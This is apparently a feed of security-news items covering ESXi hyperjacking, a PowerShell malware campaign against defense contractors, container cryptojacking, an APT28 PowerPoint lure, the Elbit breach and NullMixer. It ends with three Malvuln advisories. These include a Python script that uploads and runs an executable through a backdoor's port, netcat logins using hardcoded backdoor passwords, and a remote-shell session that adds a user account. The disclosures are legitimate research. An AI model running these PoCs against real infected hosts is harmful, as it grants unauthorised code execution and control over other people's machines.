For decades, security researchers warned about techniques for hijacking virtualization software. Now one group has put them into practice.

For decades, virtualization software has offered a way to vastly multiply computers’ efficiency, hosting entire collections of computers as “virtual machines” on just one physical machine. And for almost as long, security researchers have warned about the potential dark side of that technology: theoretical “hyperjacking” and “Blue Pill” attacks, where hackers hijack virtualization to spy on and manipulate virtual machines, with potentially no way for a targeted computer to detect the intrusion. That insidious spying has finally jumped from research papers to reality with warnings that one mysterious team of hackers has carried out a spree of “hyperjacking” attacks in the wild.

Today, Google-owned security firm Mandiant and virtualization firm VMware jointly published warnings that a sophisticated hacker group has been installing backdoors in VMware’s virtualization software on multiple targets’ networks as part of an apparent espionage campaign. By planting their own code in victims’ so-called hypervisors—VMware software that runs on a physical computer to manage all the virtual machines it hosts—the hackers were able to invisibly watch and run commands on the computers those hypervisors oversee. And because the malicious code targets the hypervisor on the physical machine rather than the victim’s virtual machines, the hackers’ trick multiplies their access and evades nearly all traditional security measures designed to monitor those target machines for signs of foul play.

“The idea that you can compromise one machine and from there have the ability to control virtual machines _en masse_ is huge,” says Mandiant consultant Alex Marvi. And even closely watching the processes of a target virtual machine, he says, an observer would in many cases see only “side effects” of the intrusion, given that the malware carrying out that spying had infected a part of the system entirely outside its operating system.

Mandiant discovered the hackers earlier this year and brought their techniques to VMware’s attention. Researchers say they’ve seen the group carry out their virtualization hacking—a technique historically dubbed hyperjacking in a reference to “hypervisor hijacking”—in fewer than 10 victims’ networks across North America and Asia. Mandiant notes that the hackers, which haven’t been identified as any known group, appear to be tied to China. But the company gives that claim only a “low confidence” rating, explaining that the assessment is based on an analysis of the group’s victims and some similarities between their code and that of other known malware.

While the group’s tactics appear to be rare, Mandiant warns that their techniques to bypass traditional security controls by exploiting virtualization represent a serious concern and are likely to proliferate and evolve among other hacker groups. “Now that people know this is possible, it will point them toward other comparable attacks,” says Mandiant’s Marvi. “Evolution is the big concern.”

In a technical writeup, Mandiant describes how the hackers corrupted victims’ virtualization setups by installing a malicious version of VMware’s software installation bundle to replace the legitimate version. That allowed them to hide two different backdoors, which Mandiant calls VirtualPita and VirtualPie, in VMware’s hypervisor program known as ESXi. Those backdoors let the hackers surveil and run their own commands on virtual machines managed by the infected hypervisor. Mandiant notes that the hackers didn’t actually exploit any patchable vulnerability in VMware’s software, but instead used administrator-level access to the ESXi hypervisors to plant their spy tools. That admin access suggests that their virtualization hacking served as a persistence technique, allowing them to hide their espionage more effectively long-term after gaining initial access to the victims’ network through other means.

In a statement to WIRED, VMware said that “while there is no VMware vulnerability involved, we are highlighting the need for strong operational security practices that include secure credential management and network security.” The company also pointed to a guide to “hardening” VMware setups against this sort of hacking, including better authentication measures to control who can tamper with ESXi software and validation measures to check whether hypervisors have been corrupted.

Since as early as 2006, security researchers have theorized that hyperjacking presents a method to stealthily spy on or manipulate victims using virtualization software. In a paper that year, Microsoft and University of Michigan researchers described the potential for hackers to install a malicious hypervisor they called a “hypervirus” on a target machine that places the victim inside a virtual machine run by the hacker without the victim’s knowledge. By controlling that malicious hypervisor, everything on the target machine would be under the hacker’s control, with practically no sign within the virtualized operating system that anything was amiss. Security researcher Joanna Rutkowska dubbed her own version of the technique a Blue Pill attack, since it trapped the victim in a seamless environment entirely created by the hacker, _Matrix_\-style, without their knowledge.

What Mandiant observed isn’t exactly that Blue Pill or hypervirus technique, argues Dino Dai Zovi, a well-known cybersecurity researcher who gave a talk at the Black Hat security conference about hypervisor hacking in the summer of 2006. In those theoretical attacks, including his own work, a hacker creates a new hypervisor without the victim’s knowledge, while in the cases Mandiant discovered, the spies merely hijacked existing ones. But he points out that this is a far easier and yet highly effective technique—and one he’s expected for years. “I’ve always assumed it was possible and even being done,” says Dai Zovi. “It’s just a powerful position that gives full access to any of the virtual machines running on that hypervisor.”

Aside from the difficulty of detecting the attack, he points out that it also serves as a multiplier of the hacker’s control: In virtualization setups, two to five virtual machines can typically run on any physical computer, and there are often thousands of virtual machines on an organization’s network running as everything from PCs to email servers. “That’s a lot of scale and leverage,” says Dai Zovi. “For an attacker, it’s a good return on their investment.”

Mandiant suggests in its writeup of the hacking campaign that attackers may be turning to hyperjacking as part of a larger trend of compromising network elements that have less rigorous monitoring tools than the average server or PC. But given the power of the technique—and the years of warnings—it’s perhaps most surprising that it hasn’t been put to malicious use earlier.

“When people first hear about virtualization technology, they always raise their eyebrows and ask, ‘What happens if someone takes control of the hypervisor?’” says Mandiant’s Marvi. “Now it’s happened.”

Mystery Hackers Are ‘Hyperjacking’ Targets for Insidious Spying

Zyxel CloudCNM SecuManager 3.1.0 and 3.1.1 has a hardcoded APP_KEY in /opt/axess/etc/default/axess.

CVE-2020-15330: Multiple vulnerabilities found in Zyxel CNM SecuManager

Malware used in the STEEP#MAVERICK campaign features rarely seen obfuscation, anti-analysis, and evasion capabilities.

A cyberattack campaign, potentially bent on cyber espionage, is highlighting the increasingly sophisticated nature of cyberthreats targeting defense contractors in the US and elsewhere.

The covert campaign, which researchers at Securonix detected and are tracking as STEEP#MAVERICK, has hit multiple weapons contractors in Europe in recent months, including potentially a supplier to the US F-35 Lightning II fighter aircraft program.

What makes the campaign noteworthy according to the security vendor is the overall attention the attacker has paid to operations security (OpSec) and to ensuring their malware is hard to detect, difficult to remove, and challenging to analyze. 

The PowerShell-based malware stager used in the attacks have "featured an array of interesting tactics, persistence methodology, counter-forensics and layers upon layers of obfuscation to hide its code," Securonix said in a report this week.

**Uncommon Malware Capabilities**

The STEEP#MAVERICK campaign appears to have launched in late summer with attacks on two high-profile defense contractors in Europe. Like many campaigns, the attack chain began with a spear-phishing email that contained a compressed (.zip) fie with a shortcut (.lnk) file to a PDF document purportedly describing company benefits. Securonix described the phishing email as being similar to one it had encountered in a campaign earlier this year involving North Korea's APT37 (aka Konni) threat group.

When the .lnk file is executed, it triggers what Securonix described as a "rather large and robust chain of stagers," each written in PowerShell and featuring as many as eight obfuscation layers. The malware also features extensive anti-forensic and counter-debugging capabilities which include monitoring a long list of processes that could be uses to look for malicious behavior. The malware is designed to disable logging and bypass Windows Defender. It uses several techniques to persist on a system, including by embedding itself in the system registry, by embedding itself as a scheduled task and by creating a startup shortcut on the system.

A spokesperson with Securonix's Threat Research Team says the number and variety of anti-analysis and anti-monitoring checks the malware has is unusual. So, too, is the large number of obfuscation layers for payloads and the malware's attempts to substitute or generate new custom command-and-control (C2) stager payloads in response to analysis attempts: "Some obfuscation techniques, such as using PowerShell get-alias to perform \[the invoke-expression cmdlet\] are very rarely seen."

The malicious activities were performed in an OpSec-aware manner with different types of anti-analysis checks and evasion attempts throughout the attack, at a relatively high operational tempo with custom payloads injected. 

"Based on the details of the attack, one takeaway for other organizations is paying extra attention to monitoring your security tools," the spokesperson says. "Organizations should ensure security tools work as expected and avoid relying on a single security tool or technology to detect threats."

**A Growing Cyber Threat**

The STEEP#MAVERICK campaign is only the latest in a growing number that have targeted defense contractors and suppliers in recent years. Many of these campaigns have involved state-backed actors operating out of China, Russia, North Korea, and other countries. 

In January, for instance, the US Cybersecurity and Infrastructure Security Agency (CISA) issued an alert warning of Russian state-sponsored actors targeting so-called cleared defense contractors (CDCs) in attacks designed to steal sensitive US defense information and technology. The CISA alert described the attacks as targeting a wide swath of CDCs, including those involved in developing combat systems, intelligence and surveillance technologies, weapons and missile development, and combat vehicle and aircraft design.

In February, researchers at Palo Alto Networks reported on at least four US defense contractors being targeted in a campaign to distribute a fileless, socketless backdoor called SockDetour. The attacks were part of a broader campaign that the security vendor had investigated along with the National Security Agency in 2021 involving a Chinese advanced persistent group that targeted defense contractors and organizations in multiple other sectors.

**Defense Contractors: A Vulnerable Segment**

Adding to the concerns over the rising volume of cyberattacks is the relative vulnerability of many defense contractors, despite having secrets that should be closely guarded. 

Recent research that Black Kite conducted into the security practices of the top 100 US defense contractors showed that nearly a third (32%) are vulnerable to ransomware attacks. This is because of factors like leaked or compromised credentials, and weak practices in areas such as credential management, application security and Security Sockets Layer/Transport Layer Security. 

Seventy-two percent of the respondents in the Black Kite report have experienced at least one incident involving a leaked credential.

There could be light at the end of the tunnel: The US Department of Defense, in conjunction with industry stakeholders, has developed a set of cybersecurity best practices for military contractors to use to protect sensitive data. Under the DoD's Cybersecurity Maturity Model Certification program, defense contractors are required to implement these practices — and get certified as having them — to be able to sell to government. The bad news? The rollout of the program has been delayed.

Sophisticated Covert Cyberattack Campaign Targets Military Contractors

Cloud-native threats are costing cloud customer victims money as cryptojackers mine their vulnerable cloud instances.

Threats against cloud-native infrastructure are on the rise, particularly as attackers target cloud and container resources to power their illicit cryptomining operations. In the latest twist, cybercriminals are wreaking havoc on cloud resources to both propagate and run cryptojacking enterprises in costly schemes that cost victims some $50 in cloud resources for every $1 worth of cryptocurrency that the crooks mine off of these compute reserves.

That's according to a new report out today from Sysdig, which shows that while the bad guys will indiscriminately attack any weak cloud or container resources they can get their hands on to power money-making cryptomining schemes, they're also cleverly strategic about it. 

In fact, many of the most crafty software supply chain attacks are in large part designed to spawn cryptominers via infected container images. Attackers not only leverage source code dependencies most commonly thought of in offensive supply chain attacks — they also leverage malicious container images as an effective attack vehicle, according to Sysdig's "2022 Cloud-Native Threat Report." 

Cybercriminals are taking advantage of the trend within the development community to share code and open source projects via premade container images via container registries like Docker Hub. Container images have all the required software installed and configured in an easy-to-deploy workload. While that's a serious time saver for developers, it also opens up a path for attackers to create images that have malicious payloads built in and then to seed platforms like DockerHub with their malicious wares. All it takes is for a developer to run a Docker pull request from the platform to get that malicious image running. What's more, the Docker Hub download and installation is opaque, making it even harder to spot the potential for trouble.

"It’s clear that container images have become a real attack vector, rather than a theoretical risk," the report explained, for which the Sysdig Threat Research Team (TRT) went through a monthslong process of sifting through public container images uploaded by users worldwide onto DockerHub to find malicious instances. "The methods employed by malicious actors described by Sysdig TRT are specifically targeted at cloud and container workloads."

The team's hunt surfaced more than 1,600 malicious images containing cryptominers, backdoors, and other nasty malware disguised as legitimate popular software. Cryptominers were far and away the most prevalent, making up 36% of the samples.

"Security teams can no longer delude themselves with the idea that 'containers are too new or too ephemeral for threat actors to bother,'" says Stefano Chierici, senior security researcher at Sysdig and co-author of the report. "Attackers are in the cloud, and they are taking real money. The high prevalence of cryptojacking activity is attributable to the low risk and high reward for the perpetrators."

**TeamTNT and Chimera**

As a part of the report, Chierici and his colleagues also did a deep-dive technical analysis of the tactics, techniques, and procedures (TTPs) of the TeamTNT threat group. Active since 2019, the group according to some sources has compromised over 10,000 cloud and container devices during one of its most prevalent attack campaigns, Chimera. It's best known for cryptojacking worm activity and according to the report, TeamTNT continues to refine its scripts and its TTPs in 2022. For example, it now connects scripts with the AWS Cloud Metadata service to leverage credentials associated with an EC2 instance and gain access to other resources tied to a compromised instance.

"If there are excessive permissions associated with these credentials, the attacker could gain even more access. Sysdig TRT believes that TeamTNT would want to leverage these credentials, if capable, to create more EC2 instances so it could increase its cryptomining capabilities and profits," the report said.

As part of its analysis, the team dug into a a number of XMR wallets used by TeamTNT during mining campaigns to figure out the financial impact of cryptojacking. 

Utilizing technical analysis of the threat group's operational practices during the Chimera operation, Sysdig was able to find that the adversary cost its victims $11,000 on a single AWS EC2 instance for every XMR it mined. The wallets the team recovered amounted some 40 XMR, meaning that the attackers drove up a cloud bill of nearly $430,000 to mine those coins. 

Using coin valuation from earlier this year, the report estimated the value of those coins equals about $8,100, with back-of-envelope figuring then showing that for every dollar the bad guys make, they cost victims at least $53 in cloud bills alone.

Container Supply Chain Attacks Cash In on Cryptojacking

The Russian state-sponsored threat actor known as APT28 has been found leveraging a new code execution method that makes use of mouse movement in decoy Microsoft PowerPoint documents to deploy malware.
The technique "is designed to be triggered when the user starts the presentation mode and moves the mouse," cybersecurity firm Cluster25 said in a technical report. "The code execution runs a

The Russian state-sponsored threat actor known as APT28 has been found leveraging a new code execution method that makes use of mouse movement in decoy Microsoft PowerPoint documents to deploy malware.

The technique "is designed to be triggered when the user starts the presentation mode and moves the mouse," cybersecurity firm Cluster25 said in a technical report. "The code execution runs a PowerShell script that downloads and executes a dropper from OneDrive."

The dropper, a seemingly harmless image file, functions as a pathway for a follow-on payload, a variant of a malware known as Graphite, which uses the Microsoft Graph API and OneDrive for command-and-control (C2) communications for retrieving additional payloads.

The attack employs a lure document that makes use of a template potentially linked to the Organisation for Economic Co-operation and Development (OECD), a Paris-based intergovernmental entity.

Cluster25 noted the attacks may be ongoing, considering that the URLs used in the attacks appeared active in August and September, although the hackers had previously laid the groundwork for the campaign between January and February.

Potential targets of the operation likely include entities and individuals operating in the defense and government sectors of Europe and Eastern Europe, the company added, citing an analysis of geopolitical objectives and the gathered artifacts.

This is not the first time the adversarial collective has deployed Graphite. In January 2022, Trellix disclosed a similar attack chain that exploited the MSHTML remote code execution vulnerability (CVE-2021-40444) to drop the backdoor.

The development is a sign that APT28 (aka Fancy Bear) continues to hone its technical tradecraft and evolve its methods for maximum impact as exploitation routes once deemed viable (e.g., macros) cease to be profitable.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Hackers Using PowerPoint Mouseover Trick to Infect System with Malware

By Waqas
According to the breach notification, 369 Elbit Systems employees got their information stolen by the attackers.
This is a post from HackRead.com Read the original post: US branch of Israeli defense contractor Elbit hit by data breach

Elbit Systems of America, which is the US branch of an Israeli defense contractor, Elbit, has confirmed that its network was targeted by cybercriminals in early June 2022. Resultantly, the personal data of its employees was stolen.

The Texas-based firm hasn’t shared many details on the data breach, but it did reveal that the attack disrupted its ‘cyber operations.’

**Incident Details**

According to the breach notification issued by the Maine attorney general’s office, the American arm of Elbit’s network has suffered a data breach. Around 369 Elbit Systems employees got their information stolen by the attackers.

As per the company, exposed data includes employee names, dates of birth, addresses, ethnicity, direct deposit information, and Social Security Numbers. The company’s spokesperson in America and any representative from its parent organization in Israel haven’t commented on the incident yet.

**Who is the Attacker?**

As per Elbit Systems of America, the investigation is still going on. At the moment, it is difficult to attribute this attack to a specific hacker, cybercrime gang, or nation-state. The company is also unsure about the objective behind this attack.  

1.  Iran-linked hackers hit Israeli, US, and EU defense tech firm
2.  Dark web hacker leaks sensitive Indian defense contractor data
3.  Meet SockDetour fileless backdoor targeting U.S. Defense contractors
4.  Hackers Posing as Women to Con Israeli Officials into Installing Malware
5.  Unknown TA2541 group attacking aviation and defense sectors since 2017

**About Elbit**

For your information, Elbit Systems is an electronics and defense tech firm. It mainly builds unmanned aerial drones, intelligence gathering, espionage, and surveillance-related systems for governments and militaries, electronic warfare systems, and similar equipment and sells it worldwide.

The company also creates surveillance software. It acquired Nice Systems’ cyber and intelligence unit in 2015 for a whopping $160 million and renamed it Cyberbit. 

As noted by TechCrunch, internet watchdog Citizen Lab’s research found that Cyberbit’s commercial spyware was used for espionage activities against Ethiopian dissidents in the USA and the UK.

This spyware could steal users’ private data from the targeted device, including passwords, screenshots, and emails. However, it is also suspected that the Ethiopian government itself ordered the spying activity.

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

US branch of Israeli defense contractor Elbit hit by data breach

Cybercriminals are continuing to prey on users searching for cracked software by directing them to fraudulent websites hosting weaponized installers that deploy malware called NullMixer on compromised systems.
"When a user extracts and executes NullMixer, it drops a number of malware files to the compromised machine," cybersecurity firm Kaspersky said in a Monday report. "It drops a wide variety

Cybercriminals are continuing to prey on users searching for cracked software by directing them to fraudulent websites hosting weaponized installers that deploy malware called **NullMixer** on compromised systems.

"When a user extracts and executes NullMixer, it drops a number of malware files to the compromised machine," cybersecurity firm Kaspersky said in a Monday report. "It drops a wide variety of malicious binaries to infect the machine with, such as backdoors, bankers, downloaders, spyware, and many others."

Besides siphoning users' credentials, address, credit card data, cryptocurrencies, and even Facebook and Amazon account session cookies, what makes NullMixer insidious is its ability to download dozens of trojans at once, significantly widening the scale of the infections.

Attack chains typically start when a user attempts to download cracked software from one of the sites, which leads to a password-protected archive that contains an executable file that, for its part, drops and launches a second setup binary designed to deliver an array of malicious files.

These malicious websites leverage search engine optimization (SEO) poisoning techniques such as keyword stuffing to feature them highly in search engine results. Similar tactics have been adopted by actors behind GootLoader and SolarMarker campaigns.

NullMixer, last month, was linked to the distribution of a rogue Google Chrome extension called FB Stealer, which is capable of Facebook credential theft and search engine substitution.

Some of the other prominent malware families distributed by the dropper include DanaBot and a raft of information-stealing malware such as ColdStealer, PseudoManuscrypt, Raccoon Stealer, Redline Stealer, and Vidar.

Also deployed using NullMixer are trojan downloaders like FormatLoader, GCleaner, LegionLoader (aka Satacom), LgoogLoader, PrivateLoader, SgnitLoader, ShortLoader, and SmokeLoader, as well as the C-Joker cryptocurrency wallet stealer.

Kaspersky said it blocked attempts to infect more than 47,778 victims worldwide, with a majority of the users located in Brazil, India, Russia, Italy, Germany, France, Egypt, Turkey, and the U.S. The threat actor operating NullMixer has not been attributed to a known group.

The latest findings are yet another indication that malware and unwanted applications are being increasingly propagated via pirated software. It's also recommended to check online accounts regularly for unknown transactions.

"Any download of files from untrustworthy resources is a real game of roulette: you never know when it will fire, and which threat you will get this time," Kaspersky researcher Haim Zigel said. "Receiving NullMixer, users get several threats at once."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

New NullMixer Malware Campaign Stealing Users' Payment Data and Credentials

Backdoor.Win32.Augudor.b malware suffers from a code execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/94ccd337cbdd4efbbcc0a6c888abb87d.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Augudor.bVulnerability: Remote File Write Code Execution Description: The malware drops an empty file named "zy.exe" and listens on TCP port 810. Third-party adversaries who can reach the infected host can write executable code to the empty "zy.exe" file on the system via a socket program and it will execute as soon as the binary transfer has completed. Successfully tested with a 880 byte executable.Family: AugudorType: PE32MD5: 94ccd337cbdd4efbbcc0a6c888abb87d Vuln ID: MVID-2022-0644Dropped files: zy.exeDisclosure: 09/25/2022Exploit/PoC:from socket import *MALWARE_HOST="x.x.x.x"PORT=810DOOM="DOOM_SM.exe" #880 bytesdef doit():    s=socket(AF_INET, SOCK_STREAM)    s.connect((MALWARE_HOST, PORT))    f = open(DOOM, "rb")    EXE = f.read()    s.send(EXE)    while EXE:        s.send(EXE)        EXE=f.read()    s.close()    print("By Malvuln");if __name__=="__main__":    doit()Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Augudor.b MVID-2022-0644 Code Execution

Backdoor.Win32.Psychward.b malware suffers from a hardcoded credential vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/0b8cf90ab9820cb3fcb7f1d1b45e4e57.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Psychward.bVulnerability: Weak Hardcoded CredentialsDescription: The malware listens on TCP port 8888 and requires authentication. However, the password "4174" is weak and hardcoded in cleartext within the PE file.Family: PsychwardType: PE32MD5: 0b8cf90ab9820cb3fcb7f1d1b45e4e57Vuln ID: MVID-2022-0645Disclosure: 09/25/2022Exploit/PoC:C:\>nc64.exe x.x.x.x 8888connected 09/12/22 20:44:12. version 0.2.1pwd 4174password accepteddir..12520437.cpx       2,15112520850.cpx       2,233@AudioToastIcon.png  308@EnrollmentToastIcon.png  330@VpnToastIcon.png   404@WirelessDisplayToast.png  691aadauthhelper.dll  154,624aadtb.dll     954,880AboveLockAppHost.dll  252,928Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Psychward.b MVID-2022-0645 Hardcoded Credential

Backdoor.Win32.Bingle.b malware suffers from a hardcoded credential vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/eacaa12336f50f1c395663fba92a4d32.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Bingle.bVulnerability: Weak Hardcoded CredentialsDescription: The malware is packed using ASPack 2.11, listens on TCP port 22 and requires authentication. However, the password "let me in" is weak and hardcoded within the PE file. Unpacking the executable, easily reveals the cleartext password.Family: BingleType: PE32MD5: eacaa12336f50f1c395663fba92a4d32Vuln ID: MVID-2022-0643 Disclosure: 09/24/2022004029A0                 call    sub_4010E0004029A5                 add     esp, 0Ch004029A8                 cmp     eax, ebp004029AA                 jge     short loc_4029CC004029AC                 mov     edi, [esp+eax*4+230h+var_21C]004029B0                 mov     ecx, ebx004029B2                 xor     eax, eax004029B4                 repne scasb004029B6                 not     ecx004029B8                 sub     edi, ecx004029BA                 mov     edx, ecx004029BC                 mov     esi, edi004029BE                 mov     edi, offset aLetMeIn ; "let me in"Exploit/PoC:C:\>nc64.exe x.x.x.x 22let me in Nt Shell 1.0 beta by bingle@email.com.cn        Indicator '#' is NTShell Server output.        Type ?help for support commands beyond cmd;        ?use at command line for support parameters.        Use 'net helpmsg xxx' to see detail message of Error Code.Microsoft Windows [Version 10.0.16299.309](c) 2017 Microsoft Corporation. All rights reserved.C:\Users\Victim\Desktop>whoamiwhoamidesktop-2c3iqho\victimC:\Users\Victim\Desktop>net user hyp3rlinx 1313 /addnet user hyp3rlinx 1313 /addThe command completed successfully.C:\Users\Victim\Desktop>?help#?autorun [name file "args"] --- add the [file] to autorun when reboot,                 [file] default is ntshell.exe#?canceldata            --- abort the previous file transfer command#?chdir <dir>           --- change the server current dir to <dir>,                 can be UNC(share) name#?get <file> [port]     --- GET <file> from server, server use [port] to tranfer#?help                  --- show this HELP#?httpget <url> <file>  --- get the 'file' from 'url',                eg:httpget http://192.168.0.1 /hackdir/hackprog.exe#?pskill PID            --- Kill the Process with PID#?pslist                --- List the all process in system#?put <file> [port]     --- PUT <file> to server, server use [port] to tranfer#?quit                  --- QUIT the telnetd program#?restart [<user> [pass]]       --- restart the shell as [user] in stead of                IUSR_computer if [user] specified, no need to reconnect#?sysinfor              --- Get the System os informationDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Tag

#backdoor